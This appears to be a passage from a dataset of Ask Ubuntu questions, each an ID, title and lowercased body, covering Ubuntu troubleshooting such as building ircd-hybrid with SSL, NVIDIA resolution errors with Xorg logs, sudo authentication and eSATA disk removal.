in the crypto part of the setup : checking for openssl ... /usr checking for openssl 0.9.6 or above ... found checking for rsa_free in -lcrypto ... yes checking for evp_bf_cfb ... yes checking for evp_cast5_cfb ... yes checking for evp_idea_cfb ... no checking for evp_rc5_32_12_16_cfb ... no checking for evp_des_ede3_cfb ... yes checking for evp_des_cfb ... yes i am running the latest open ssl : $ openssl version openssl 1.0.1 14 mar 2012 not sure why the configure script is n't seeing those cipher algos . edit 2 : just installed a vm on my esxi box . brand new 32-bit install 12.04 lts . same problem . installs fine via apt-get but ssl is not enabled . tried the patch and it is also missing the algos as i listed above .
235468	how do you append info to an environment variable ?	the method export vname=value will override the original value . i want a way to append to the old value by colon . any idea how ? thanks .
235475	changed account to auto login , now su password does not work	i have one user account on my laptop , and it has the same password as the su password . i changed the user account to an auto login account , and now the user password is not accepted ( i.e . authentication error ) for installations , updates ... anything . i 'm sure i have n't forgotten the password , and pretty sure i have n't dorked up some setting by logging in as root since i normally have to enter the su password to install updates . when i login and am prompted to enter my password to unlock the user keyring , the password works . i fear that all efforts will be hampered because i ca n't get to the su level of control . help ? attempts thus far : tried this fix , which sounds very simliar - do n't have 'clown ' command available : setup auto login and now i do not have root authorization for anything tried the simple 'passwd username ' without luck â 'authentication token manipulation error'
235478	amd ati video problem when using 12.11 beta version	i have installed the amd 12.11 beta drivers on my ubuntu 12.10 but sadly it does not start anymore and it hangs in the initial purple screen . any device , ? how can i fix this ? thanks .
235480	is it possible to set up idle with 2.7 and 3.2 ?	is it possible to set up idle separately for 2.7 and 3.2 so either version can be used through it ?
235487	how to uninstall windows 8 ?	i do not want to dual-boot , i want my pc to solely run ubuntu . how can i do this ? i 've tried everything and it just wo n't work . i am currently running windows 8 and want to run ubuntu 12.10 . i 've tried to install and run gparted , and it wo n't run . i 've also tried uninstalling ubuntu ( actually , i restored my system to default , since i have all my files backed up on my server ) and then loading it via usb . i 'm at my wits end here ! please help .
235490	is there key infrastructure allows one running as sudo remotely without prompting password ?	for example , i can use ssh-id-copy to get the key and login to the remote server without entering the password . is there a similar mechanism to run as root without prompting password ? i do n't know . if login with a key is sort of safe , then i argue there should be a mechanism like that for sudo . nopasswd is not a good solution , however . thanks .
235491	ubuntu one and goodreader	i have a large collection of academic papers as pdf files organized into a file structure . i uploaded them all to ubuntu one , hoping to then use goodreader on my ipad to download them to this device . however , goodreader does not display ubuntu one as a server option . i tried downloading the ubuntu one software for ios , which is actually for the iphone . it appears worthless for transfering files to the ipad for use with goodreader . is there any way of downloading pdf files from ubuntu one to goodreader ? perhaps by jailbreaking my ipad ?
235499	ircd-hybdrid , ssl , and ubuntu 12.04 lts	i have a small server running ubuntu 12.04 lts . on it i wanted to set up irc with ssl support . it appears that ircd-hybrid is most popular . i am not married to using it so other options are welcome . however , i am not seeing other options . anyway , i following the instructions ( i listed a couple at the end ) and install ircd-hybrid no problem . it 's actually running now . however , i noticed that ssl is n't working . the port is never being listened to . digging deeper , i look back at the building process and notice that openssl is n't being included . so i have been trying to build and just to clarify , here is the ./configure output : compiling ircd-hybrid 7.2.2 installing into : /usr ziplinks ... ... ... ... ... . yes **openssl ... ... ... ... ... .. no** modules ... ... ... ... ... .. shared ipv6 support ... ... ... ... yes net i/o implementation .. sigio efnet server ... ... ... ... no ( use example.conf ) halfops support ... ... ... yes small network ... ... ... .. no g-line voting ... ... ... .. yes [ /code ] a few line up in the output of the ./configure script i notice that it seems that all the encryption algos are unavailable ! checking for openssl ... /usr checking for openssl 0.9.6 or above ... found checking for rsa_free in -lcrypto ... yes checking for evp_bf_cfb ... no checking for evp_cast5_cfb ... no checking for evp_idea_cfb ... no checking for evp_rc5_32_12_16_cfb ... no checking for evp_des_ede3_cfb ... no checking for evp_des_cfb ... no which if you look into the configure script you 'll see that at least one of the encryption libraries need to be enabled . this is a hunch as i am not entirely positive about this . it seems that openssl has disabled rc5 and a couple other algos . i 've rebuilt and installed openssl with the enable-rc5 and other flags but no dice . this is on ubuntu 12.04 . help ? anyone ? i 'd like to enable ssl on irc on my personal server . it does n't have to be ircd-hybrid . i have been looking at the forums on ubuntu and generally following these instructions . thanks !
235500	transfer browser tabs from firefox to google chrome	if google chrome and firefox are both running , is there any way to transfer all browser tabs from firefox to google chrome ? i want to write a shell script that will transfer all tabs from firefox to google chrome on ubuntu .
235507	xconfig xrandr badmatch	recently i minimal installed my os , but got an unexpected error while setting my monitor resolution . it seems like a very old problem , but this time there are something else ( i think ) . to install the desktop environment : apt-get update , apt-get install xorg-core xserver-xorg-core gnome-core gdm3 to install graphic grivers apt-get install build-essential nvidia-kernel-common linux-headers- $ ( uname -r ) , ./nvidia-linux-x86_64-304.64.run steps above seems all things are in the correctly way . to set resolution : cvt 1440 900 , xrandr -- newmode xxx , xrandr -- addmode vga-0 xxx then i got that error : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 153 ( randr ) . minor opcode of failed request : 18 ( rraddoutputmode ) . serial number of failed request : 29 . current serial number in output stream : 30 . i do n't know what information u need , and just list some graphic card model : nvidia gt630 . graphic card 's memory size : 512m ddr5 . monitor : phlips 190cw ( 1440x900 , works well on windows ) . this is my settings in windows ( i have n't install the monitor driver and windows just recogniez it as 190g6 ) xrandr out put screen 0 : minimum 8 x 8 , current 1280 x 1024 , maximum 16384 x 16384 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 connected 1280x1024+0+0 ( normal left inverted right x axis y axis ) 338mm x 270mm 1280x1024 60.0*+ 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 640x480 75.0 72.8 59.9 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) 1440x900_60.00 ( 0x29f ) 106.5mhz h : width 1440 start 1528 end 1672 total 1904 skew 0 clock 55.9khz v : height 900 start 903 end 909 total 934 clock 59.9hz lshw -c video out put *-display description : vga compatible controller product : nvidia corporation vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:05:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f6000000-f6ffffff memory : e0000000-efffffff ( prefetchable ) memory : f0000000-f1ffffff ( prefetchable ) ioport : d000 ( size=128 ) memory : f7000000-f707ffff ( prefetchable ) xorg.conf section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 30.0 - 83.0 vertrefresh 55.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection i trid to get edid : apt-get install read-edid , sudo get-edid | parse-edid but got this error : get-edid : get-edid version 2.0.0 performing real mode vbe call interrupt 0x10 ax=0x4f00 bx=0x0 cx=0x0 function supported call successful vbe version 300 vbe string at 0x11100 `` nvidia '' vbe/ddc service about to be called report ddc capabilities performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x0 cx=0x0 function supported call successful monitor and video card combination does not support ddc1 transfers monitor and video card combination does not support ddc2 transfers 0 seconds per 128 byte edid block transfer screen is not blanked during ddc transfer reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function supported call failed the edid data should not be trusted as the vbe call failed error : output block unchanged i tried to force the resolution to 1440x900 by using nvidia-settings , after reboot , resolution changed to 1440x1024 ( nvidia-settings added a line to xorg.conf option `` metamodes '' `` 1440x1024 +0+0 '' ) . screen become horizon-scrollable like that : i also tried to extract edid.bin ( by using nvidia-settings ) and add option `` customedid '' `` dfp-1 : /etc/x11/edid.bin '' at section `` device '' to xorg.conf . thanks to the awesome post fixing ugly dvi/hdmi displays due to edid bugs on nvidia drivers , but unfortunately it does n't work either . update : var/log/xorg.0.log x.org x server 1.7.7 release date : 2010-05-04 x protocol version 11 , revision 0 build operating system : linux 3.0.0-1-amd64 x86_64 debian current operating system : linux xx 2.6.32-5-amd64 # 1 smp sun sep 23 10:07:46 utc 2012 x86_64 kernel command line : boot_image=/boot/vmlinuz-2.6.32-5-amd64 root=uuid=df3ea9ad-faaf-4918-a213-5a673080e935 ro quiet build date : 29 october 2011 06:58:14pm xorg-server 2:1.7.7-14 ( julien cristau < jcristau @ debian.org > ) current version of pixman : 0.16.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : tue jan 8 23:09:08 2013 ( == ) using config file : `` /etc/x11/xorg.conf '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( == ) serverlayout `` layout0 '' ( ** ) | -- > screen `` screen0 '' ( 0 ) ( ** ) | | -- > monitor `` monitor0 '' ( ** ) | | -- > device `` device0 '' ( ** ) | -- > input device `` keyboard0 '' ( ** ) | -- > input device `` mouse0 '' ( ** ) option `` xinerama '' `` 0 '' ( == ) automatically adding devices ( == ) automatically enabling devices ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . entry deleted from font path . ( ww ) `fonts.dir ' not found ( or not valid ) in `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' . entry deleted from font path . ( run 'mkfontdir ' on `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' ) . ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/75dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , /usr/share/fonts/x11/75dpi , built-ins ( == ) modulepath set to `` /usr/lib/xorg/modules '' ( ww ) allowemptyinput is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . ( ww ) disabling keyboard0 ( ww ) disabling mouse0 ( ii ) loader magic : 0x7c8a40 ( ii ) module abi versions : x.org ansi c emulation : 0.4 x.org video driver : 6.0 x.org xinput driver : 7.0 x.org server extension : 2.0 ( ++ ) using vt number 7 ( -- ) pci : * ( 0:5:0:0 ) 10de:0f00:0000:0000 nvidia corporation rev 161 , mem @ 0xf6000000/16777216 , 0xe0000000/268435456 , 0xf0000000/33554432 , i/o @ 0x0000d000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 ( ii ) open acpi successful ( /var/run/acpid.socket ) ( ii ) loadmodule : `` extmod '' ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so ( ii ) module extmod : vendor= '' x.org foundation '' compiled for 1.7.7 , module version = 1.0.0 module class : x.org server extension abi class : x.org server extension , version 2.0 ( ii ) loading extension selinux ( ii ) loading extension mit-screen-saver ( ii ) loading extension xfree86-vidmodeextension ( ii ) loading extension xfree86-dga ( ii ) loading extension dpms ( ii ) loading extension xvideo ( ii ) loading extension xvideo-motioncompensation ( ii ) loading extension x-resource ( ii ) loadmodule : `` dbe '' ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so ( ii ) module dbe : vendor= '' x.org foundation '' compiled for 1.7.7 , module version = 1.0.0 module class : x.org server extension abi class : x.org server extension , version 2.0 ( ii ) loading extension double-buffer ( ii ) loadmodule : `` glx '' ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so ( ii ) module glx : vendor= '' nvidia corporation '' compiled for 4.0.2 , module version = 1.0.0 module class : x.org server extension ( ii ) nvidia glx module 304.64 tue oct 30 11:18:32 pdt 2012 ( ii ) loading extension glx ( ii ) loadmodule : `` record '' ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so ( ii ) module record : vendor= '' x.org foundation '' compiled for 1.7.7 , module version = 1.13.0 module class : x.org server extension abi class : x.org server extension , version 2.0 ( ii ) loading extension record ( ii ) loadmodule : `` dri '' ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so ( ii ) module dri : vendor= '' x.org foundation '' compiled for 1.7.7 , module version = 1.0.0 abi class : x.org server extension , version 2.0 ( ii ) loading extension xfree86-dri ( ii ) loadmodule : `` dri2 '' ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so ( ii ) module dri2 : vendor= '' x.org foundation '' compiled for 1.7.7 , module version = 1.1.0 abi class : x.org server extension , version 2.0 ( ii ) loading extension dri2 ( ii ) loadmodule : `` nvidia '' ( ii ) loading /usr/lib/xorg/modules/drivers/nvidia_drv.so ( ii ) module nvidia : vendor= '' nvidia corporation '' compiled for 4.0.2 , module version = 1.0.0 module class : x.org video driver ( ii ) nvidia dlloader x driver 304.64 tue oct 30 10:59:51 pdt 2012 ( ii ) nvidia unified driver for all supported nvidia gpus ( ii ) primary device is : pci 05 @ 00:00:0 ( ii ) loading sub module `` fb '' ( ii ) loadmodule : `` fb '' ( ii ) loading /usr/lib/xorg/modules/libfb.so ( ii ) module fb : vendor= '' x.org foundation '' compiled for 1.7.7 , module version = 1.0.0 abi class : x.org ansi c emulation , version 0.4 ( ii ) loading sub module `` wfb '' ( ii ) loadmodule : `` wfb '' ( ii ) loading /usr/lib/xorg/modules/libwfb.so ( ii ) module wfb : vendor= '' x.org foundation '' compiled for 1.7.7 , module version = 1.0.0 abi class : x.org ansi c emulation , version 0.4 ( ii ) loading sub module `` ramdac '' ( ii ) loadmodule : `` ramdac '' ( ii ) module `` ramdac '' already built-in ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 ( == ) nvidia ( 0 ) : rgb weight 888 ( == ) nvidia ( 0 ) : default visual is truecolor ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) ( ** ) nvidia ( 0 ) : option `` customedid '' `` dfp-0 : /home/teifi/edid.bin '' ( ** ) jan 08 23:09:09 nvidia ( 0 ) : enabling 2d acceleration ( ii ) jan 08 23:09:10 nvidia ( gpu-0 ) : display ( philips 190g6 ( crt-1 ) ) does not support nvidia 3d ( ii ) jan 08 23:09:10 nvidia ( gpu-0 ) : vision stereo . ( ii ) jan 08 23:09:10 nvidia ( 0 ) : nvidia gpu geforce gt 630 ( gf108 ) at pci:5:0:0 ( gpu-0 ) ( -- ) jan 08 23:09:10 nvidia ( 0 ) : memory : 1048576 kbytes ( -- ) jan 08 23:09:10 nvidia ( 0 ) : videobios : 70.08.aa.00.00 ( ii ) jan 08 23:09:10 nvidia ( 0 ) : detected pci express link width : 16x ( -- ) jan 08 23:09:10 nvidia ( 0 ) : interlaced video modes are supported on this gpu ( -- ) jan 08 23:09:10 nvidia ( 0 ) : valid display device ( s ) on geforce gt 630 at pci:5:0:0 ( -- ) jan 08 23:09:10 nvidia ( 0 ) : crt-0 ( -- ) jan 08 23:09:10 nvidia ( 0 ) : philips 190g6 ( crt-1 ) ( connected ) ( -- ) jan 08 23:09:10 nvidia ( 0 ) : dfp-0 ( -- ) jan 08 23:09:10 nvidia ( 0 ) : dfp-1 ( -- ) jan 08 23:09:10 nvidia ( 0 ) : crt-0 : 400.0 mhz maximum pixel clock ( -- ) jan 08 23:09:10 nvidia ( 0 ) : philips 190g6 ( crt-1 ) : 480.0 mhz maximum pixel clock ( -- ) jan 08 23:09:10 nvidia ( 0 ) : dfp-0 : 330.0 mhz maximum pixel clock ( -- ) jan 08 23:09:10 nvidia ( 0 ) : dfp-0 : internal single link tmds ( -- ) jan 08 23:09:10 nvidia ( 0 ) : dfp-1 : 165.0 mhz maximum pixel clock ( -- ) jan 08 23:09:10 nvidia ( 0 ) : dfp-1 : internal single link tmds ( ** ) jan 08 23:09:10 nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display ( ** ) jan 08 23:09:10 nvidia ( 0 ) : device philips 190g6 ( crt-1 ) ( using edid frequencies has ( ** ) jan 08 23:09:10 nvidia ( 0 ) : been enabled on all display devices . ) ( ww ) jan 08 23:09:10 nvidia ( 0 ) : no valid modes for `` crt-1:1440x900 '' ; removing . ( ww ) jan 08 23:09:10 nvidia ( 0 ) : no valid modes for `` crt-1:1280x800 '' ; removing . ( ii ) jan 08 23:09:10 nvidia ( 0 ) : validated metamodes : ( ii ) jan 08 23:09:10 nvidia ( 0 ) : `` crt-1:1024x768 '' ( ii ) jan 08 23:09:10 nvidia ( 0 ) : `` crt-1:800x600 '' ( ii ) jan 08 23:09:10 nvidia ( 0 ) : virtual screen size determined to be 1024 x 768 ( -- ) jan 08 23:09:10 nvidia ( 0 ) : dpi set to ( 68 , 65 ) ; computed from `` useediddpi '' x config ( -- ) jan 08 23:09:10 nvidia ( 0 ) : option ( -- ) depth 24 pixmap format is 32 bpp ( ii ) jan 08 23:09:10 nvidia : using 3072.00 mb of virtual memory for indirect memory ( ii ) jan 08 23:09:10 nvidia : access . ( ii ) jan 08 23:09:10 nvidia ( 0 ) : setting mode `` crt-1:1024x768 '' ( ii ) loading extension nv-glx ( == ) nvidia ( 0 ) : disabling shared memory pixmaps ( == ) nvidia ( 0 ) : backing store disabled ( == ) nvidia ( 0 ) : silken mouse enabled ( == ) nvidia ( 0 ) : dpms enabled ( ii ) loading extension nv-control ( ii ) loading extension xinerama ( ww ) nvidia ( 0 ) : option `` twinview '' is not used ( -- ) randr disabled ( ii ) initializing built-in extension generic event extension ( ii ) initializing built-in extension shape ( ii ) initializing built-in extension mit-shm ( ii ) initializing built-in extension xinputextension ( ii ) initializing built-in extension xtest ( ii ) initializing built-in extension big-requests ( ii ) initializing built-in extension sync ( ii ) initializing built-in extension xkeyboard ( ii ) initializing built-in extension xc-misc ( ii ) initializing built-in extension security ( ii ) initializing built-in extension xinerama ( ii ) initializing built-in extension xfixes ( ii ) initializing built-in extension render ( ii ) initializing built-in extension randr ( ii ) initializing built-in extension composite ( ii ) initializing built-in extension damage selinux : disabled on system , not enabling in x server ( ii ) initializing extension glx ( ii ) config/udev : adding input device power button ( /dev/input/event4 ) ( ** ) power button : applying inputclass `` evdev keyboard catchall '' ( ii ) loadmodule : `` evdev '' ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so ( ii ) module evdev : vendor= '' x.org foundation '' compiled for 1.7.6.901 , module version = 2.3.2 module class : x.org xinput driver abi class : x.org xinput driver , version 7.0 ( ** ) power button : always reports core events ( ** ) power button : device : `` /dev/input/event4 '' ( ii ) power button : found keys ( ii ) power button : configuring as keyboard ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard ) ( ** ) option `` xkb_rules '' `` evdev '' ( ** ) option `` xkb_model '' `` pc105 '' ( ** ) option `` xkb_layout '' `` us '' ( ii ) config/udev : adding input device power button ( /dev/input/event3 ) ( ** ) power button : applying inputclass `` evdev keyboard catchall '' ( ** ) power button : always reports core events ( ** ) power button : device : `` /dev/input/event3 '' ( ii ) power button : found keys ( ii ) power button : configuring as keyboard ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard ) ( ** ) option `` xkb_rules '' `` evdev '' ( ** ) option `` xkb_model '' `` pc105 '' ( ** ) option `` xkb_layout '' `` us '' ( ii ) config/udev : adding input device usb optical mouse ( /dev/input/event2 ) ( ** ) usb optical mouse : applying inputclass `` evdev pointer catchall '' ( ** ) usb optical mouse : always reports core events ( ** ) usb optical mouse : device : `` /dev/input/event2 '' ( ii ) usb optical mouse : found 3 mouse buttons ( ii ) usb optical mouse : found scroll wheel ( s ) ( ii ) usb optical mouse : found relative axes ( ii ) usb optical mouse : found x and y relative axes ( ii ) usb optical mouse : configuring as mouse ( ** ) usb optical mouse : yaxismapping : buttons 4 and 5 ( ** ) usb optical mouse : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 ( ii ) xinput : adding extended input device `` usb optical mouse '' ( type : mouse ) ( ii ) usb optical mouse : initialized for relative axes . ( ii ) config/udev : adding input device usb optical mouse ( /dev/input/mouse1 ) ( ii ) no input driver/identifier specified ( ignoring ) ( ii ) config/udev : adding input device at translated set 2 keyboard ( /dev/input/event1 ) ( ** ) at translated set 2 keyboard : applying inputclass `` evdev keyboard catchall '' ( ** ) at translated set 2 keyboard : always reports core events ( ** ) at translated set 2 keyboard : device : `` /dev/input/event1 '' ( ii ) at translated set 2 keyboard : found keys ( ii ) at translated set 2 keyboard : configuring as keyboard ( ii ) xinput : adding extended input device `` at translated set 2 keyboard '' ( type : keyboard ) ( ** ) option `` xkb_rules '' `` evdev '' ( ** ) option `` xkb_model '' `` pc105 '' ( ** ) option `` xkb_layout '' `` us '' ( ii ) config/udev : adding input device pc speaker ( /dev/input/event5 ) ( ii ) no input driver/identifier specified ( ignoring ) ( ii ) config/udev : adding input device macintosh mouse button emulation ( /dev/input/event0 ) ( ** ) macintosh mouse button emulation : applying inputclass `` evdev pointer catchall '' ( ** ) macintosh mouse button emulation : always reports core events ( ** ) macintosh mouse button emulation : device : `` /dev/input/event0 '' ( ii ) macintosh mouse button emulation : found 3 mouse buttons ( ii ) macintosh mouse button emulation : found relative axes ( ii ) macintosh mouse button emulation : found x and y relative axes ( ii ) macintosh mouse button emulation : configuring as mouse ( ** ) macintosh mouse button emulation : yaxismapping : buttons 4 and 5 ( ** ) macintosh mouse button emulation : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 ( ii ) xinput : adding extended input device `` macintosh mouse button emulation '' ( type : mouse ) ( ii ) macintosh mouse button emulation : initialized for relative axes . ( ii ) config/udev : adding input device macintosh mouse button emulation ( /dev/input/mouse0 ) ( ii ) no input driver/identifier specified ( ignoring ) ( ii ) jan 08 23:09:12 nvidia ( gpu-0 ) : display ( philips 190g6 ( crt-1 ) ) does not support nvidia 3d ( ii ) jan 08 23:09:12 nvidia ( gpu-0 ) : vision stereo . ( ** ) jan 08 23:09:12 nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display ( ** ) jan 08 23:09:12 nvidia ( 0 ) : device philips 190g6 ( crt-1 ) ( using edid frequencies has ( ** ) jan 08 23:09:12 nvidia ( 0 ) : been enabled on all display devices . ) ( ii ) jan 08 23:09:12 nvidia ( gpu-0 ) : display ( philips 190g6 ( crt-1 ) ) does not support nvidia 3d ( ii ) jan 08 23:09:12 nvidia ( gpu-0 ) : vision stereo . ( ** ) jan 08 23:09:12 nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display ( ** ) jan 08 23:09:12 nvidia ( 0 ) : device philips 190g6 ( crt-1 ) ( using edid frequencies has ( ** ) jan 08 23:09:12 nvidia ( 0 ) : been enabled on all display devices . ) ( ii ) jan 08 23:09:12 nvidia ( gpu-0 ) : display ( philips 190g6 ( crt-1 ) ) does not support nvidia 3d ( ii ) jan 08 23:09:12 nvidia ( gpu-0 ) : vision stereo . ( ** ) jan 08 23:09:12 nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display ( ** ) jan 08 23:09:12 nvidia ( 0 ) : device philips 190g6 ( crt-1 ) ( using edid frequencies has ( ** ) jan 08 23:09:12 nvidia ( 0 ) : been enabled on all display devices . ) ( ii ) jan 08 23:09:59 nvidia ( gpu-0 ) : display ( philips 190g6 ( crt-1 ) ) does not support nvidia 3d ( ii ) jan 08 23:09:59 nvidia ( gpu-0 ) : vision stereo . ( ** ) jan 08 23:09:59 nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display ( ** ) jan 08 23:09:59 nvidia ( 0 ) : device philips 190g6 ( crt-1 ) ( using edid frequencies has ( ** ) jan 08 23:09:59 nvidia ( 0 ) : been enabled on all display devices . ) ( ii ) jan 08 23:10:00 nvidia ( gpu-0 ) : display ( philips 190g6 ( crt-1 ) ) does not support nvidia 3d ( ii ) jan 08 23:10:00 nvidia ( gpu-0 ) : vision stereo . ( ** ) jan 08 23:10:00 nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display ( ** ) jan 08 23:10:00 nvidia ( 0 ) : device philips 190g6 ( crt-1 ) ( using edid frequencies has ( ** ) jan 08 23:10:00 nvidia ( 0 ) : been enabled on all display devices . ) ( ii ) jan 08 23:10:00 nvidia ( gpu-0 ) : display ( philips 190g6 ( crt-1 ) ) does not support nvidia 3d ( ii ) jan 08 23:10:00 nvidia ( gpu-0 ) : vision stereo . ( ** ) jan 08 23:10:00 nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display ( ** ) jan 08 23:10:00 nvidia ( 0 ) : device philips 190g6 ( crt-1 ) ( using edid frequencies has ( ** ) jan 08 23:10:00 nvidia ( 0 ) : been enabled on all display devices . ) ( ii ) jan 08 23:10:00 nvidia ( 0 ) : setting mode `` vga-0 : nvidia-auto-select @ 1280x1024 +0+0 '' ( ii ) jan 08 23:10:01 nvidia ( gpu-0 ) : display ( philips 190g6 ( crt-1 ) ) does not support nvidia 3d ( ii ) jan 08 23:10:01 nvidia ( gpu-0 ) : vision stereo . ( ** ) jan 08 23:10:01 nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display ( ** ) jan 08 23:10:01 nvidia ( 0 ) : device philips 190g6 ( crt-1 ) ( using edid frequencies has ( ** ) jan 08 23:10:01 nvidia ( 0 ) : been enabled on all display devices . ) any help is greatly appreciated . thank you
235508	firefox cookie popup hell	is there a way to close all these `` confirm setting cookie '' popups at once : currently whenever this happens , i spend a half-hour clicking until all the boxes disappear .
235510	what is use of get_hz ( )	please tell me what is the use of get_hz ( ) system call . any link for its documentation ? ? i tried to search for this in google but could not get the usage of this function thanks , vivek
235511	how to backup virtual drives with playonlinux ?	playonlinux installs the applications in separate virtual drives . each virtual drive represents a different windows machine . i have configured playonlinux on my laptop and installed several programs in it . these programs go in the hidden .playonlinux directory in home . my .playonlinux directory is about 12 gb in size . along with virtual drives it also contains resources that playonlinux downloads from internet such as windows service pack and alternate versions of wine . not wanting to download/install everything again i copied the .playonlinux directory to my second computer before running playonlinux . however on startup playonlinux initialized that directory to its own taste , flattening the 12gb directory to a mere 500 kilobytes . my question is - is it possible to backup playonlinux virtual drives ? how ? this would be tremendously helpful in taking snapshots of drives for reverting later and for transferring settings to another system .
235515	ubuntu can not create partitions when i try to install	the situation ~ i spilled some booze on my laptop a few months ago , since then i have been working a usb mouse and keyboard . on christmas day ( yay ! ) my laptop died , made a funny noise then went to blue screen . when i try to reboot it says can not find the required files and can not find operating system ( was windows 7 ) . i can 'try ubuntu ' when booting from usb but when i try to fully install i am greeted with an error saying that it can not create partitions . i have tried both installing by formatting the entire hard drive ( 500gb ) and installing ubuntu to take up the entire hard drive , and also by creating my own partitions in the sizes recommended by various folks on this here forum but the furthest i have got is a window asking me my time zone , the error appears then i have to start over or restart my laptop . when 'trying ' ubuntu i can access the internet for about 2 hours then an error occurs and i have to restart ( a lengthy process ) in order to get back online . when in this state i can not access the laptop hd . i bought the laptop in korea so some sub menus within the guts of the machine are in hangul but i can navigate most of these . please help .
235516	safely removing esata disks	is there any way to safely remove any external disk connected via esata ? disks make an ugly noise when unplugged , even if there are no mounted partitions ... i found somewhere this little command : sdparm -- flexible -- command=stop /dev/sdb & > /dev/null it seems to shutdown the disk . but just when it powers off , it starts working again ... any clue ?
235518	evolution 3.2 non standard smtp port	i 've just been forced to update my lovely , stable ubuntu 10.04 to 12.04 and the process has been dreadful tbh . `` improvements '' to evolution have pretty much broken it for me . my biggest gripe is that i can not set a non-standard port for smtp . my provider listens on 2525 for mail ( not 25,465 or 587 ) . on the older evolution i could just append the port to the mail host eg : host.mail.somewhere:2525 but that does not work in 3.2 . it borks the hostname and stb with `` could not connect to mailhost % 25252525253a2525 : '' i 'm really disappointed in this and think i already know that i 'm going to have to switch to thunderbird ( which i really do n't like ) - but just in case , does anyone know a workaround for this really irritating 'feature ' ?
235520	ck kernel for quantal quetzal ?	are their any pre-compiled kernel packages for ubuntu 12.10 that provide the ck patchset , or at least the bfs scheduler ?
235526	how do i launch skype call recorder in 12.10 ?	how can i get skype call recorder to work under ubuntu 12.10 ? skype call recorder does not launch . i see the icon but it does not open whether skype is on or off .
235527	here can i download ubuntu mobile ?	i keep reading stories in the press about ubuntu mobile , but where is the download ? i ca n't develop for an os i ca n't get hold of !
235528	ubuntu fresh install video overscan	i have a new i7 build with a motherboard ( asus p8 z77-v lx ) with a built in video that lists as lshw -c video *-display description : vga compatible controller product : xeon e3-1200 v2/3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : f7800000-f7bfffff memory : e0000000-efffffff ioport : f000 ( size=64 ) although under configurations it seems to list video as `` generic '' . i ca n't seem to find an overscan correction option anyplace for this video card to adjust the screen so its not placing the graphics over the edges of my hd monitor . any information can help on how i can correct this so i can adjust my overscan problem in ubuntu 12.04 .
235532	how can i install moonlight for chrome in 12.04 ?	i 'd like to install the latest moonlight version to use it with google chrome ( not chromium )
235533	how to set keyboard layout for a macbook pro ?	i 'm running ubuntu in virtualbox on my macbook pro . i chose a 'french ( mac ) ' layout ( see below ) . unfortunately , the character | ( vertical bar ) does not seem to be mapped ! usually , in mac osx , i get it by pressing : [ alt ] + [ shift ] +l . how can i add a vertical bar ( any key combination would be ok ) to this keyboard ?
